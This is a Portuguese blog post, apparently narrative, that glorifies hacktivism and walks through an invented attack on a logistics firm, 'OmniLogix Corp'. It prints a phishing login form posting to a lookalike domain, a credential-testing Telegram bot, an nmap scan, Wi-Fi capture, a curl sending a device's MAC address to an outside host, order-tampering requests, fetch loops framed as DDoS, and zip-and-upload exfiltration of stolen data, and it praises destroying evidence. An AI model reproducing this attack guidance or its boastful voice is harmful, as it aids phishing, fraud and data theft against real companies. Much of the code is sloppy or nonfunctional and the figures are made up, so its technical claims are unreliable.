Rodrigo Carv 
Olá!
Hoje vou mostrar para vocês como funciona um ataque coordenado a uma grande infraestrutura da internet — e como são os hackers de verdade.
Todo mundo já ouviu a palavra hacker, e cada um de vocês provavelmente tem uma ideia do que isso significa — ou pensa saber o que fazemos de verdade. Muitos dizem que somos criminosos. Outros, que defendemos a liberdade das pessoas. Há quem nos veja como justiceiros em nome da população menos favorecida.
Quando se fala em hacker, a imagem mais comum que vem à cabeça é a de alguém trancado no quarto por mais de 24 horas, usando máscara, digitando códigos intermináveis, roubando senhas e espalhando spam.
Mas não somos isso. Essa imagem não nos representa.
O que nos move é o desafio. Quanto mais complexo, mais nos dedicamos. Quanto maiores os problemas, mais prazer encontramos em enfrentá-los.
A ideia não é mostrar alguém isolado em casa usando exploits. Tudo isso que a mídia mostra sobre nós está longe da realidade.
Hacker, seja ético ou não, é parte de uma legião. Qualquer pessoa pode ser hacker — basta aderir à nossa causa, seja ela social, ideológica ou individual. Estamos espalhados pelo mundo todo. Nossas ações não partem de prédios cheios de computadores ligados em redes cabeadas ou Wi-Fi.
Se fosse assim, o hacktivismo nem existiria. Somos muito mais do que um quarto escuro e um teclado iluminado.
Basta um celular com acesso à internet para realizarmos qualquer ação. Mudamos de identidade, destruímos celulares, HDs, computadores — e, se necessário, ateamos fogo em tudo para não deixar rastros.
Já reparou que a elite do hacktivismo raramente é encontrada?
Eles precisam de nós. Nós não precisamos deles.
Trocamos de cabelo, aparência, identidade — mas nunca usamos o mesmo dispositivo duas vezes.
Você acredita mesmo que saímos na rua de capuz e máscara, como nos filmes? Se alguém fizesse isso, chamariam de louco.
Somos pessoas comuns andando entre vocês na sociedade.
Os ataques são feitos de forma sutil. E vocês nem percebem.
Como acontece um ataque hacker?
Tudo começa com a causa. Quem entra de verdade nela se conecta pelos fóruns da dark web. Lá é onde nossos planos são formalizados.
Você nunca saberá a identidade de um membro.
Você não sabe quem eu sou. E eu não sei quem é você.
Mas, mesmo assim, estamos conectados.
O ATAQUE INVISÍVEL À OMNILOGIX CORP
Multinacional-alvo: OmniLogix Corp (logística e tecnologia)
Grupo hacker: 14 indivíduos “comuns”, em 10 países
Disfarces: Influencer, entregador, senhora que compartilha memes, adolescente no metrô…
🧠 ETAPA 1: RECONHECIMENTO INVISÍVEL VIA CELULAR
📲 Aplicativo camuflado: “Calculadora” (com Termux escondido)
bash
CopiarEditar
# Atalho no Termux ativado via gestos no celular
termux-open-url https://omnix-loginpanel.com/admin
nmap -p 80,443 omnixcorp.com
🛰️ Scanner de QR Code que na verdade detecta redes Wi-Fi ocultas:
bash
CopiarEditar
# Script rodando no app de QR Code “alterado”
airodump-ng wlan0mon –write /sdcard/logs/omnidata.csv
📸 “Selfie” na frente da empresa, mas capturando fingerprints de rede:
bash
CopiarEditar
# Script embutido em app de câmera
bssid=$(iw dev wlan0 info | grep ssid)
curl -X POST -d “bssid=$bssid&mac=$(cat /sys/class/net/wlan0/address)” https://api.tor-hidden-node.net/upload
📢 ETAPA 2: ENGENHARIA SOCIAL VIA REDES SOCIAIS
🎯 Link malicioso nos stories do Instagram com encurtador:
“🚚 OmniLogix lança bônus para entregadores! Cadastre-se: [bit.ly/omnibonus]”
Link leva a:
html
CopiarEditar
<!– Página de phishing idêntica ao site da OmniLogix –>
<form method=”POST” action=”https://omnilogix-login.ga/auth”>
<input name=”user” type=”text”>
<input name=”pass” type=”password”>
</form>
🤖 ETAPA 3: AUTOMAÇÃO EM SEGUNDO PLANO
📲 Celular com bot do Telegram ativado por webhook:
python
CopiarEditar
# Bot testa credenciais automaticamente
import requests
def check_login(user, pwd):
r = requests.post(“https://omnilogix.com/auth”, data={“user”: user, “pass”: pwd})
return “dashboard” in r.text
@bot.message_handler(commands=[‘test’])
def handle_test(message):
creds = message.text.split()[1:]
if check_login(*creds):
bot.send_message(chat_id, “✔️ Acesso válido”)
✳️ ETAPA 4: COMANDOS POR EMOJI
🔥 Script detecta emojis no Telegram para acionar ações:
bash
CopiarEditar
# Script rodando com bot de Telegram
if [[ $MESSAGE == *”📦”* ]]; then
curl -X POST https://omnilogix.com/api/alterar-endereco \
-d ‘{“pedido”:”#4876″,”novoEndereco”:”Rua Clandestina, 404″}’
fi
🌐 ETAPA 5: DDoS USANDO REDES MÓVEIS
Navegador em loop infinito usando WebView + Shortcuts:
javascript
CopiarEditar
// Script usado em extensão do navegador
setInterval(() => {
fetch(“https://omnilogix.com/api/consulta-pedido?id=123456”);
}, 1000);
Ou usando o Shortcuts da Apple:
text
CopiarEditar
Repeat 1000 times:
Get contents of URL: https://omnilogix.com/api/ping
💼 ETAPA 6: TRANSFERÊNCIA E EXTORSÃO
Arquivos criptografados enviados por WeTransfer e Telegram:
bash
CopiarEditar
zip -e dados_omnix.zip dados_roubados/
curl -F “file=@dados_omnix.zip” https://wetransfer.com/upload
📉 RESULTADO FINAL DO ATAQUE
2.1 milhões de usuários afetados
13.500 pacotes desviados
R$ 67 milhões em prejuízo direto
Confidencialidades expostas em dublagens cômicas no TikTok
🧬 TÉCNICAS ULTRAMODERNAS UTILIZADAS
Técnica
Descrição
LOLM (Living Off the Land Mobile)
Uso de apps comuns com comandos escondidos (Termux, QR code scanner)
Comando por emoji
Emojis no Telegram ativam scripts (🧊 extrair dados, 📦 mudar pedidos)
Automação por gestos
Gestos ou toques iniciam rotinas escondidas
Execução em segundo plano
Celular parece inofensivo, mas scripts operam sob vídeos e redes sociais
DNS over HTTPS stealth
Comunicação com C2 oculta via DoH, burlando firewall.
🧠 REFLEXÃO FINAL
O novo hacker não invade firewalls — ele tira selfies.
Não força portas — apenas compartilha figurinhas.
E não se esconde no escuro — ele está na fila do café, sorrindo
Até o próximo capítulo.. Quem sabe não se encontramos por aí..
